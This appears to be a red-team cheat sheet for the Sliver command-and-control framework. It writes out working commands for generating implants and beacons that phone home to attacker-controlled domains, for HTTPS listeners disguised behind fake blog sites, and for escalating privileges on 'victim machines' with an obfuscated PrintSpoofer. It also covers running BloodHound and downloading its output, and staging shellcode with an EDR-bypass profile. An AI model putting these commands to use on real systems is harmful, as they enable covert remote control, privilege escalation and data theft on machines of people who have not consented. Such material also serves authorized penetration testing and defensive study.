v2.0.2
Powered by

# Sliver

Sliver's a rad C2

# Resources that help me make sense of Sliver

# Install Sliver

# Linux one-liner 

curl https://sliver.sh/install|sudo bash

# With single binary 

cd ~/
wget https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux
chmod +x sliver-server_linux

# Install certbot (optional - for if you want to integrate with LetsEncrypt) 

sudo apt install certbot -y
sudo certbot certonly

# I like this method because I port-forward 80/443 to my internal host, then choose option 1 (temporary Web server) and then fill out the rest of the fields to generate my cert
#
# Copy the key files to the home folder to make them easier to access later:
#
# sudo cp /etc/letsencrypt/live/domain.com/fullchain.pem ~/
# sudo cp /etc/letsencrypt/live/domain.com/privkey.pem ~/
#
# Adjust permissions so your basic "kali" or whatever user can see these files:
# sudo chown sevminsec:sevminsec /home/sevminsec/privkey.pem /home/sevminsec/fullchain.pem
# sudo chmod 640 privkey.pem fullchain.pem

# Run Sliver 

sudo ./sliver-server_linux

# Install the armory

(At a sliver shell)

armory install all

# IMPLANTS

# Generate a general implant 

generate --http https://10.7.10.253:8090 --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name ETPHONEHOME

# Generate an implant with a custom domain 

generate --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name ETPHONEHOME

# Delete an implant 

implants rm NAME-OF-IMPLANT

# Start a general listener 

https --lhost 10.7.10.253 --lport 8090

# Start a listener with a custom domain 

https --domain example.com

# Generate a fake Web site to go along with your HTTPS listener 

websites add-content --website fake-blog --web-path / --content www/index.html

Note: the fake-blog name will be referenced below if you setup an HTTPS listener with a custom domain and specific fake content.

# Starting an HTTPs listener with a custom domain WITH pre-generated LetsEncrypt cert AND static content on your fake site 

https --domain yourdomain.net.ru.edu.lol --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

# Establishing sessions with victim machines

From the victim system, find a way to run your beacon.exe. It will "phone home" to Sliver C2. To "upgrade" to a higher-privilege shell, upload an obfuscated printspoofer.exe:

use xxx (the session that was spawned)
upload /home/youruser/notprintspoofer.exe c:\\users\\public\\nps.exe

Then run it:

execute c:\\users\\public\\nps.exe -c c:\\users\\public\\your-original-beacon.exe

# Interacting with sessions

# Run BloodHound 

sharp-hound-4 -- 'c all' --outputdirectory 'c:\users\public'

Find and download it:

ls *.zip
download 2025blahblah.zip

# Kill all dead sessions (marked as [DEAD]) 

sessions -C

# BEACONS

# Generate one with custom domain 

generate beacon --http yourdomain.ru --format exe --arch amd64 --disable-sgn --skip-symbols --save splinter.exe --name BEECONE

# Check beacon status 

beacons

# Watch beacons continuously for check in 

beacons watch

# Adjust check-in time of the beacon 

use xxx

# Reconfigure callback time to 200s with an 11s jitter
reconfigure -i 200s -j 11s

# Check pending tasks 

tasks

# PROFILES

Under construction

# Generate profile 

profiles new beacon --http domain.com --format shellcode --disable-sgn --skip-symbols bee

# Add fake blog 

websites add-content --website fake-blog --web-path / --content www/index.html

# Stand up domain with HTTPS 

https --domain domain.com --cert ./fullchain.pem --key ./privkey.pem --website fake-blog

# Stage a listener 

stage-listener --url https://yourdomain.com:8080 --profile bee

# Generate the profile 

profiles generate bee

# Setup a staged payload with shellcodepack 

echo "https://domain.com:8080/name-doesnt-matter.woff" | shellcode_pack.exe -t HTTPS_STAGER -G preloads\yourshellcode.bin --bypass-profile .\bypass_profiles\edrbypass.json

# Start/restart sliver 

sudo systemctl start sliver